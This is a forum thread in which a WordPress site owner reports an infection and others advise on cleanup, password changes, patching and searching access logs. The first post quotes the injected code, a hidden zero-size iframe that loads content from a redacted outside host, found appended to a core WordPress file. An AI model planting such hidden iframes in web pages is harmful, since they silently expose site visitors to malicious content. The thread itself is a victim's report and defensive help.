SitePoint Sponsor

User Tag List

Results 1 to 4 of 4
  1. #1
    SitePoint Addict savagepriest's Avatar
    Join Date
    Mar 2006
    Location
    India
    Posts
    201
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Lightbulb All my wordpress sites underattack 3.0.1 (different servers) XSS I think

    Hello two of my sites were attacked by malicious script and are now down. These two wordpress sites have been injected by this code

    Code:
    <iframe frameborder="0" height="0" name="frame1" scrolling="no" src="http://<snip/>:8080/home/1/" width="0"></iframe>
    <!--73e181c1b8bd4e09d3bc7f39bb0cb1dd-->
    the file which was infected was under wp-includes/default-widgets.php last line had this code my site autogl.com is already been banned by firefox today what should I do Please help me I want to prevent my site anyone else facing similar problem

    Check this page http://inj3ct0r.com/exploits/13702
    Last edited by Mittineague; Nov 3, 2010 at 12:34. Reason: removing mal url

  2. #2
    SitePoint Wizard bronze trophy bluedreamer's Avatar
    Join Date
    Jul 2005
    Location
    Middle England
    Posts
    3,266
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    1. Clean up all infected files
    2. Install/upgrade to the latest version
    3. Update all passwords including your hosting control panel, FTP and WP logins
    4. Contact your host to see if they can identify how the attack took place, just in case it's a weak server setup

    ...and update your Wordpress installation regularly to make sure you are fully patched

  3. #3
    SitePoint Addict savagepriest's Avatar
    Join Date
    Mar 2006
    Location
    India
    Posts
    201
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I am now seeing that nearly all files have been infected including index.php

  4. #4
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This could be from any number of sources. The link you provide probably isn't how they got into your website.

    However, if you have phpMyAdmin on your site, or osCommerce, Openx, or any number of other software programs, then you should have them updated - immediately. We've been seeing a number of attacks against standard software on websites.

    If you have your access logs, look in them for a series of 404 errors where someone is scanning your site and looking for where software is installed. See what file they're looking for then do a search on that log file to see when it returns a 200 - meaning they found it. Usually that datetime stamp will be close to when your site was hacked.

    Although, if the hackers uploaded a shell, you can't base your search on datetime stamps. Many of the shells we've been seeing have the ability to change the datetime stamp of files - to further hide their work.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •